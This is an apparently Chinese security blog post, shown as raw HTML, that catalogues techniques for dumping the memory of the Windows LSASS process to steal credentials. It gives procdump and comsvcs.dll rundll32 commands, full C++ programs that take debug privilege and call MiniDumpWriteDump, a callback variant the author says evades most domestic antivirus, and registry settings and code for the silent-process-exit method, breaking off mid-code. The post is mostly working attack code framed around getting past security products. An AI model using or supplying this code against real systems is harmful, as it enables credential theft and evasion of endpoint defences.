<!DOCTYPE html>



  


<html class="theme-next muse use-motion" lang="zh-Hans">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.3" rel="stylesheet" type="text/css" />


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.3">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.3">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.3">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.3" color="#222">





  <meta name="keywords" content="Hexo, NexT" />





  <link rel="alternate" href="/atom.xml" title="HaCky的安全备忘录" type="application/atom+xml" />






<meta name="description" content="0x01 现成工具&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;任务管理器 &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;procdump:procdump -ma lsass.exe lsass.dmp &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;Sharp dump:其核心也是使用MiniDumpWriteDump">
<meta property="og:type" content="article">
<meta property="og:title" content="Lsass Dump">
<meta property="og:url" content="https://findream.github.io/2022/12/30/Lsass Dump/index.html">
<meta property="og:site_name" content="HaCky的安全备忘录">
<meta property="og:description" content="0x01 现成工具&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;任务管理器 &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;procdump:procdump -ma lsass.exe lsass.dmp &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;Sharp dump:其核心也是使用MiniDumpWriteDump">
<meta property="og:locale" content="zh-Hans">
<meta property="og:updated_time" content="2022-12-31T11:46:23.640Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="Lsass Dump">
<meta name="twitter:description" content="0x01 现成工具&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;任务管理器 &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;procdump:procdump -ma lsass.exe lsass.dmp &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;Sharp dump:其核心也是使用MiniDumpWriteDump">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Muse',
    version: '5.1.3',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="https://findream.github.io/2022/12/30/Lsass Dump/"/>





  <title>Lsass Dump | HaCky的安全备忘录</title>
  








</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">HaCky的安全备忘录</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br />
            
            关于
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-question-circle"></i> <br />
            
            标签
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br />
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            归档
          </a>
        </li>
      
        
        <li class="menu-item menu-item-schedule">
          <a href="/schedule/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-calendar"></i> <br />
            
            日程表
          </a>
        </li>
      
        
        <li class="menu-item menu-item-sitemap">
          <a href="/sitemap.xml" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-sitemap"></i> <br />
            
            站点地图
          </a>
        </li>
      
        
        <li class="menu-item menu-item-commonweal">
          <a href="/404/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-heartbeat"></i> <br />
            
            公益404
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="https://findream.github.io/2022/12/30/Lsass Dump/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="HaCky">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="HaCky的安全备忘录">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">Lsass Dump</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2022-12-30T15:02:11+08:00">
                2022-12-30
              </time>
            

            

            
          </span>

          
            <span class="post-category" >
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">分类于</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/windows安全/" itemprop="url" rel="index">
                    <span itemprop="name">windows安全</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h2 id="0x01-现成工具"><a href="#0x01-现成工具" class="headerlink" title="0x01 现成工具"></a>0x01 现成工具</h2><p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;任务管理器</p>
<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;procdump:<code>procdump -ma lsass.exe lsass.dmp</code></p>
<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Sharp dump:其核心也是使用<code>MiniDumpWriteDump</code></p>
<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Out-MiniDump:是PowerSploit下的一个<a href="https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Out-Minidump.ps1" target="_blank" rel="external">转储组件</a>。同理也是使用<code>MiniDumpWriteDump</code></p>
<a id="more"></a>
<h2 id="0x02-本机API或者Dll"><a href="#0x02-本机API或者Dll" class="headerlink" title="0x02 本机API或者Dll"></a>0x02 本机API或者Dll</h2><p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;comsvcs.dll:管理员权限下使用<code>rundll32.exe comsvcs.dll MiniDump &lt;lsass PID&gt; &lt;out path&gt; full</code></p>
<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;API就是转储最常见的<code>MiniDumpWriteDump</code>。<br><figure class="highlight cpp"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div><div class="line">26</div><div class="line">27</div><div class="line">28</div><div class="line">29</div><div class="line">30</div><div class="line">31</div><div class="line">32</div><div class="line">33</div><div class="line">34</div><div class="line">35</div><div class="line">36</div><div class="line">37</div><div class="line">38</div><div class="line">39</div><div class="line">40</div><div class="line">41</div><div class="line">42</div><div class="line">43</div><div class="line">44</div><div class="line">45</div><div class="line">46</div><div class="line">47</div></pre></td><td class="code"><pre><div class="line"><span class="function">BOOL <span class="title">ProcessMain</span><span class="params">(VOID)</span></span></div><div class="line"><span class="function"></span>&#123;</div><div class="line">    <span class="comment">//是否是管理员权限</span></div><div class="line">	<span class="keyword">if</span> (IsElevated() == FALSE)</div><div class="line">	&#123;</div><div class="line">		<span class="built_in">printf</span>(<span class="string">"[!] IsElevated \r\n"</span>);</div><div class="line">		<span class="keyword">return</span> FALSE;</div><div class="line">	&#125;</div><div class="line">	<span class="built_in">printf</span>(<span class="string">"[+] run as Administor \n"</span>);</div><div class="line">	<span class="comment">//启动Debug权限</span></div><div class="line">	SetDebugPrivilege();</div><div class="line">	<span class="built_in">printf</span>(<span class="string">"[+] set debug privilege \n"</span>);</div><div class="line">  	<span class="comment">//获取LSASS进程Pid</span></div><div class="line">	DWORD dwPid = GetLsassPid();</div><div class="line">	<span class="built_in">printf</span>(<span class="string">"[+] get pid of lsass:%d\n"</span>, dwPid);</div><div class="line">	<span class="comment">//打开进程获取句柄</span></div><div class="line">	HANDLE hProcessOfLsass = OpenProcess(PROCESS_ALL_ACCESS, <span class="number">0</span>, dwPid);</div><div class="line">	<span class="keyword">if</span> (hProcessOfLsass == <span class="literal">NULL</span>)</div><div class="line">	&#123;</div><div class="line">		<span class="built_in">printf</span>(<span class="string">"[!] OpenProcess \r\n"</span>);</div><div class="line">		<span class="keyword">return</span> FALSE;</div><div class="line">	&#125;</div><div class="line">	<span class="built_in">printf</span>(<span class="string">"[+] get handle of lsass \n"</span>);</div><div class="line">	<span class="comment">//获取MiniDumpWriteDump函数地址</span></div><div class="line">	pfnMiniDumpWriteDump MiniDumpWriteDump = (pfnMiniDumpWriteDump)GetProcAddress(</div><div class="line">		LoadLibraryA(<span class="string">"Dbghelp.dll"</span>), <span class="string">"MiniDumpWriteDump"</span>);   <span class="comment">//</span></div><div class="line">	<span class="keyword">if</span> (MiniDumpWriteDump == <span class="literal">NULL</span>)</div><div class="line">	&#123;</div><div class="line">		<span class="built_in">printf</span>(<span class="string">"[!] get address of mimidumpwritedump \n"</span>);</div><div class="line">		<span class="keyword">return</span> FALSE;</div><div class="line">	&#125;</div><div class="line">	<span class="built_in">printf</span>(<span class="string">"[+] get address of mimidumpwritedump \n"</span>);</div><div class="line">	BOOL bResult = FALSE;</div><div class="line">	HANDLE hFile = CreateFileW(<span class="string">L"c:\\dmplsass.bin"</span>, GENERIC_ALL, <span class="number">0</span>, <span class="literal">NULL</span>, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, <span class="literal">NULL</span>);</div><div class="line">	<span class="comment">//调用函数创建转储</span></div><div class="line">	bResult = MiniDumpWriteDump(hProcessOfLsass, dwPid, hFile, MiniDumpWithFullMemory, <span class="literal">NULL</span>, <span class="literal">NULL</span>, <span class="literal">NULL</span>);</div><div class="line">	<span class="keyword">if</span> (bResult == FALSE)</div><div class="line">	&#123;</div><div class="line">		<span class="built_in">printf</span>(<span class="string">"[!] MiniDumpWriteDump \n"</span>);</div><div class="line">		CloseHandle(hFile);</div><div class="line">		<span class="keyword">return</span> FALSE;</div><div class="line">	&#125;</div><div class="line">	<span class="comment">//关闭文件句柄</span></div><div class="line">	<span class="built_in">printf</span>(<span class="string">"[+] mini dump write dump \n"</span>);</div><div class="line">	CloseHandle(hFile);</div><div class="line">	<span class="keyword">return</span> TRUE;</div><div class="line">&#125;</div></pre></td></tr></table></figure></p>
<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;除了常规的直接使用<code>MiniDumpWriteDump</code>，现在很多C2都使用带有回调功能的<code>MiniDumpWriteDump</code>，因为<code>MiniDumpWriteDump</code>函数原型,函数第7个参数是一个指向<code>MINIDUMP_CALLBACK_INFORMATION</code>结构的指针，包含了回调函数的指针和参数。使用带回调功能的<code>MiniDumpWriteDump</code>并没有改写<code>MiniDumpWriteDump</code>函数，实现起来比较方便，也能过掉国内大多数AV。具体使用如下。<br><figure class="highlight cs"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div></pre></td><td class="code"><pre><div class="line"><span class="function">BOOL <span class="title">MiniDumpWriteDump</span>(<span class="params"></span></span></div><div class="line"><span class="function"><span class="params">  [<span class="keyword">in</span>] HANDLE                            hProcess,</span></span></div><div class="line"><span class="function"><span class="params">  [<span class="keyword">in</span>] DWORD                             ProcessId,</span></span></div><div class="line"><span class="function"><span class="params">  [<span class="keyword">in</span>] HANDLE                            hFile,</span></span></div><div class="line"><span class="function"><span class="params">  [<span class="keyword">in</span>] MINIDUMP_TYPE                     DumpType,</span></span></div><div class="line"><span class="function"><span class="params">  [<span class="keyword">in</span>] PMINIDUMP_EXCEPTION_INFORMATION   ExceptionParam,</span></span></div><div class="line"><span class="function"><span class="params">  [<span class="keyword">in</span>] PMINIDUMP_USER_STREAM_INFORMATION UserStreamParam,</span></span></div><div class="line"><span class="function"><span class="params">  [<span class="keyword">in</span>] PMINIDUMP_CALLBACK_INFORMATION    CallbackParam</span></span></div><div class="line"><span class="function"><span class="params"></span>)</span>;</div></pre></td></tr></table></figure></p>
<figure class="highlight cpp"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div><div class="line">26</div><div class="line">27</div><div class="line">28</div><div class="line">29</div><div class="line">30</div><div class="line">31</div><div class="line">32</div><div class="line">33</div><div class="line">34</div><div class="line">35</div><div class="line">36</div><div class="line">37</div><div class="line">38</div><div class="line">39</div><div class="line">40</div><div class="line">41</div><div class="line">42</div><div class="line">43</div><div class="line">44</div><div class="line">45</div><div class="line">46</div><div class="line">47</div><div class="line">48</div><div class="line">49</div><div class="line">50</div><div class="line">51</div><div class="line">52</div><div class="line">53</div><div class="line">54</div><div class="line">55</div><div class="line">56</div><div class="line">57</div><div class="line">58</div><div class="line">59</div><div class="line">60</div><div class="line">61</div><div class="line">62</div><div class="line">63</div><div class="line">64</div><div class="line">65</div><div class="line">66</div><div class="line">67</div><div class="line">68</div><div class="line">69</div><div class="line">70</div><div class="line">71</div><div class="line">72</div><div class="line">73</div><div class="line">74</div><div class="line">75</div><div class="line">76</div><div class="line">77</div><div class="line">78</div><div class="line">79</div><div class="line">80</div><div class="line">81</div><div class="line">82</div><div class="line">83</div><div class="line">84</div><div class="line">85</div></pre></td><td class="code"><pre><div class="line"><span class="comment">//回调函数</span></div><div class="line"><span class="function">BOOL CALLBACK <span class="title">minidumpCallback</span><span class="params">(</span></span></div><div class="line"><span class="function"><span class="params">	__in     PVOID callbackParam,</span></span></div><div class="line"><span class="function"><span class="params">	__in     <span class="keyword">const</span> PMINIDUMP_CALLBACK_INPUT callbackInput,</span></span></div><div class="line"><span class="function"><span class="params">	__inout  PMINIDUMP_CALLBACK_OUTPUT callbackOutput</span></span></div><div class="line"><span class="function"><span class="params">	)</span></span></div><div class="line"><span class="function"></span>&#123;</div><div class="line">	LPVOID destination = <span class="number">0</span>, source = <span class="number">0</span>;</div><div class="line">	DWORD bufferSize = <span class="number">0</span>;</div><div class="line">	<span class="keyword">switch</span> (callbackInput-&gt;CallbackType)</div><div class="line">	&#123;</div><div class="line">	<span class="keyword">case</span> IoStartCallback:</div><div class="line">		callbackOutput-&gt;Status = S_FALSE;</div><div class="line">		<span class="keyword">break</span>;</div><div class="line">	<span class="keyword">case</span> IoWriteAllCallback:</div><div class="line">		callbackOutput-&gt;Status = S_OK;</div><div class="line">		source = callbackInput-&gt;Io.Buffer;</div><div class="line">		destination = (LPVOID)((DWORD_PTR)buffer + (DWORD_PTR)callbackInput-&gt;Io.Offset);</div><div class="line">		bufferSize = callbackInput-&gt;Io.BufferBytes;</div><div class="line">		bytesRead += bufferSize;</div><div class="line">		RtlCopyMemory(destination, source, bufferSize);</div><div class="line">		<span class="keyword">break</span>;</div><div class="line">	<span class="keyword">case</span> IoFinishCallback:</div><div class="line">		callbackOutput-&gt;Status = S_OK;</div><div class="line">		<span class="keyword">break</span>;</div><div class="line">	<span class="keyword">default</span>:</div><div class="line">		<span class="keyword">return</span> <span class="literal">true</span>;</div><div class="line">	&#125;</div><div class="line">	<span class="keyword">return</span> TRUE;</div><div class="line">&#125;</div><div class="line"><span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">(<span class="keyword">void</span>)</span></span></div><div class="line"><span class="function"></span>&#123;</div><div class="line">	<span class="keyword">if</span> (IsElevated() == FALSE)</div><div class="line">	&#123;</div><div class="line">		<span class="built_in">printf</span>(<span class="string">"[!] IsElevated \r\n"</span>);</div><div class="line">		<span class="built_in">exit</span>(<span class="number">0</span>);</div><div class="line">	&#125;</div><div class="line">	<span class="built_in">printf</span>(<span class="string">"[+] run as Administor \n"</span>);</div><div class="line">	SetDebugPrivilege();</div><div class="line">	<span class="built_in">printf</span>(<span class="string">"[+] set debug privilege \n"</span>);</div><div class="line">	DWORD dwPid = GetLsassPid();</div><div class="line">	<span class="built_in">printf</span>(<span class="string">"[+] get pid of lsass:%d\n"</span>, dwPid);</div><div class="line">	HANDLE hProcessOfLsass = OpenProcess(PROCESS_ALL_ACCESS, <span class="number">0</span>, dwPid);</div><div class="line">	<span class="keyword">if</span> (hProcessOfLsass == <span class="literal">NULL</span>)</div><div class="line">	&#123;</div><div class="line">		<span class="built_in">printf</span>(<span class="string">"[!] OpenProcess \r\n"</span>);</div><div class="line">		<span class="built_in">exit</span>(<span class="number">0</span>);</div><div class="line">	&#125;</div><div class="line">	<span class="built_in">printf</span>(<span class="string">"[+] get handle of lsass \n"</span>);</div><div class="line">	<span class="comment">//初始化MINIDUMP_CALLBACK_INFORMATION</span></div><div class="line">	MINIDUMP_CALLBACK_INFORMATION callbackInfo;</div><div class="line">	ZeroMemory(&amp;callbackInfo, <span class="keyword">sizeof</span>(MINIDUMP_CALLBACK_INFORMATION));</div><div class="line">	callbackInfo.CallbackRoutine = &amp;minidumpCallback;</div><div class="line">	callbackInfo.CallbackParam = <span class="literal">NULL</span>;</div><div class="line">	pfnMiniDumpWriteDump MiniDumpWriteDump = (pfnMiniDumpWriteDump)GetProcAddress(</div><div class="line">		LoadLibraryA(<span class="string">"Dbghelp.dll"</span>), <span class="string">"MiniDumpWriteDump"</span>);   </div><div class="line">	<span class="keyword">if</span> (MiniDumpWriteDump == <span class="literal">NULL</span>)</div><div class="line">	&#123;</div><div class="line">		<span class="built_in">printf</span>(<span class="string">"[!] get address of mimidumpwritedump \n"</span>);</div><div class="line">		<span class="built_in">exit</span>(<span class="number">0</span>);</div><div class="line">	&#125;</div><div class="line">	<span class="built_in">printf</span>(<span class="string">"[+] get address of mimidumpwritedump \n"</span>);</div><div class="line">	BOOL bResult = FALSE;</div><div class="line">	bResult = MiniDumpWriteDump(hProcessOfLsass, dwPid, <span class="literal">NULL</span>, MiniDumpWithFullMemory, <span class="literal">NULL</span>, <span class="literal">NULL</span>, &amp;callbackInfo);</div><div class="line">	<span class="keyword">if</span> (bResult == TRUE)</div><div class="line">	&#123;</div><div class="line">		<span class="built_in">printf</span>(<span class="string">"[+] mini dump write dump \n"</span>);</div><div class="line">		<span class="keyword">long</span> <span class="keyword">int</span> size = bytesRead;</div><div class="line">		<span class="keyword">char</span> *securitySth = <span class="keyword">new</span> <span class="keyword">char</span>[size];</div><div class="line">		<span class="built_in">memcpy</span>(securitySth, buffer, bytesRead);</div><div class="line">		DWORD bytesWritten = <span class="number">0</span>;</div><div class="line">		HANDLE outFile = CreateFileW(<span class="string">L"dmplsass.bin"</span>, GENERIC_ALL, <span class="number">0</span>, <span class="literal">NULL</span>, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, <span class="literal">NULL</span>);</div><div class="line">		<span class="keyword">if</span> (outFile != <span class="literal">NULL</span>)</div><div class="line">		&#123;</div><div class="line">			<span class="built_in">printf</span>(<span class="string">"[+] create dump file \n"</span>);</div><div class="line">			WriteFile(outFile, securitySth, bytesRead, &amp;bytesWritten, <span class="literal">NULL</span>);</div><div class="line">			CloseHandle(outFile);</div><div class="line">		&#125;</div><div class="line">	&#125;</div><div class="line">	<span class="keyword">else</span></div><div class="line">	&#123;</div><div class="line">		<span class="built_in">printf</span>(<span class="string">"[!] mimi dump %x\n"</span>, GetLastError());</div><div class="line">	&#125;</div><div class="line">	<span class="keyword">return</span> <span class="number">0</span>;</div><div class="line">&#125;</div></pre></td></tr></table></figure>
<h2 id="0x03-RtlReportSilentProcessExit静默进程退出"><a href="#0x03-RtlReportSilentProcessExit静默进程退出" class="headerlink" title="0x03 RtlReportSilentProcessExit静默进程退出"></a>0x03 RtlReportSilentProcessExit静默进程退出</h2><p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<a href="https://www.deepinstinct.com/blog/lsass-memory-dumps-are-stealthier-than-ever-before-part-2" target="_blank" rel="external">LSASS Memory Dumps are Stealthier than Ever Before - Part 2</a></p>
<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;当进程被终止的时候，它会调用ntdll.dll的<code>RtlReportSilentProcessExit()</code>,然后与Windows 错误报告服务(<code>WerSvcGroup</code>下的<code>WerSvc</code>)通讯,然后WER服务将启动<code>WerFault.exe</code>，它将执行退出进程的转储。有趣的是，<code>调用此API不会导致进程退出</code>。</p>
<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Silent Process Exit是从windows7中引入的一种机制，该机制在1)自身调用ExitProcess()自行终止，或者2)另一个进程通过TerminateProcess()终止时,为受监控进程触发指定的操作，目前支持的操作有三种：1）启动监控进程 2）显示弹出窗口 3）创建转储文件</p>
<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;利用Silent Process Exit机制需要设置注册表项目。1）在<code>HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\&lt;process.exe&gt;</code>的<code>GlobalFlag</code>键设置为<code>FLG_MONITOR_SILENT_PROCESS_EXIT (0x200)</code> 2)在<code>HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\&lt;process.exe&gt;</code>项下设置三个属性<br><figure class="highlight haml"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div></pre></td><td class="code"><pre><div class="line">-<span class="ruby">DumpType           <span class="number">0x02</span>        dump内存的类型</span></div><div class="line"><span class="ruby">-LocalDumpFolder    <span class="symbol">c:</span>\temp     这是dump后保存的地址</span></div><div class="line"><span class="ruby">-ReportingMode      <span class="number">0x02</span>        退出执行的操作</span></div></pre></td></tr></table></figure></p>
<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;关于<code>HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\&lt;process.exe&gt;</code>项目下三个属性更为详细的介绍如下<br><figure class="highlight less"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div></pre></td><td class="code"><pre><div class="line"><span class="selector-tag">ReportingMode</span> (REG_DWORD) 需要执行的操作</div><div class="line">* <span class="selector-tag">LAUNCH_MONITORPROCESS</span> (<span class="number">0</span>x1) – 启动一个监控进程</div><div class="line">* <span class="selector-tag">LOCAL_DUMP</span> (<span class="number">0</span>x2) – 为导致终止的进程和被终止的进程创建转储文件</div><div class="line">* <span class="selector-tag">NOTIFICATION</span> (<span class="number">0</span>x4) – 显示弹出通知</div><div class="line"><span class="selector-tag">LocalDumpFolder</span>(REG_SZ) 转储文件保存的路径</div><div class="line"><span class="selector-tag">DumpType</span>(REG_DWORD)转储文件类型</div></pre></td></tr></table></figure></p>
<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;在<a href="https://forum.butian.net/share/887" target="_blank" rel="external">静默退出 DUMP LSASS.EXE</a>一文中有详细的代码介绍。在装了卡巴斯基的环境中，因为卡巴对于LSASS Dump的保护机制，第三方进程很难对LSASS进程进行转储，可以考虑利用注入的方式进行转储，或者使用文章中的RemoteCreateThread方法进行转储。但是此时可能又要准备绕过卡巴对于注入的监控。<br><figure class="highlight perl"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div><div class="line">26</div><div class="line">27</div><div class="line">28</div><div class="line">29</div><div class="line">30</div><div class="line">31</div><div class="line">32</div><div class="line">33</div><div class="line">34</div><div class="line">35</div><div class="line">36</div><div class="line">37</div><div class="line">38</div><div class="line">39</div><div class="line">40</div><div class="line">41</div><div class="line">42</div><div class="line">43</div><div class="line">44</div><div class="line">45</div><div class="line">46</div><div class="line">47</div><div class="line">48</div><div class="line">49</div><div class="line">50</div><div class="line">51</div><div class="line">52</div><div class="line">53</div><div class="line">54</div><div class="line">55</div><div class="line">56</div></pre></td><td class="code"><pre><div class="line"><span class="keyword">int</span> main() </div><div class="line">&#123;</div><div class="line">	PCWCHAR targetProcName = L<span class="string">"lsass.exe"</span>;</div><div class="line">	DWORD pid = -<span class="number">1</span>;</div><div class="line">	HMODULE hNtMod = NULL;</div><div class="line">	fRtlReportSilentProcessExit fnRtlReportSilentProcessExit = NULL;</div><div class="line">	HANDLE hLsassProc = NULL;</div><div class="line">	NTSTATUS ntStatus = -<span class="number">1</span>;</div><div class="line">	<span class="keyword">if</span> (!EnableDebugPriv()) &#123;</div><div class="line">		<span class="keyword">printf</span>(<span class="string">" [!] EnableDebugPriv: %X\n"</span>, GetLastError());</div><div class="line">		<span class="keyword">return</span> <span class="number">1</span>;</div><div class="line">	&#125;</div><div class="line">	<span class="keyword">printf</span>(<span class="string">"[+] EnableDebugPriv OK\n"</span>);</div><div class="line">	<span class="keyword">if</span> (!setRelatedRegs(targetProcName)) &#123;</div><div class="line">		<span class="keyword">printf</span>(<span class="string">"[!] setRelatedRegs: %X\n"</span>, GetLastError());</div><div class="line">		<span class="keyword">return</span> <span class="number">1</span>;</div><div class="line">	&#125;</div><div class="line">	<span class="keyword">printf</span>(<span class="string">"[+] setRelatedRegs OK\n"</span>);</div><div class="line">	pid = getPidByName(targetProcName);</div><div class="line">	<span class="keyword">if</span> (-<span class="number">1</span> == pid) &#123;</div><div class="line">		<span class="keyword">printf</span>(<span class="string">"[!] getPidByName: %#X\n"</span>, pid);</div><div class="line">		<span class="keyword">return</span> <span class="number">1</span>;</div><div class="line">	&#125;</div><div class="line">	<span class="keyword">printf</span>(<span class="string">"+] getPidByName: %X\n"</span>, pid);</div><div class="line">	<span class="keyword">do</span></div><div class="line">	&#123;</div><div class="line">		hNtMod = GetModuleHandleW(L<span class="string">"ntdll.dll"</span>);</div><div class="line">		<span class="keyword">if</span> (!hNtMod) &#123;</div><div class="line">			<span class="keyword">printf</span>(<span class="string">"[!]GetModuleHandleW\n"</span>);</div><div class="line">			<span class="keyword">break</span>;</div><div class="line">		&#125;</div><div class="line">		<span class="keyword">printf</span>(<span class="string">"[+]GetModuleHandleW: %X\n"</span>, (DWORD)hNtMod);</div><div class="line">		fnRtlReportSilentProcessExit = 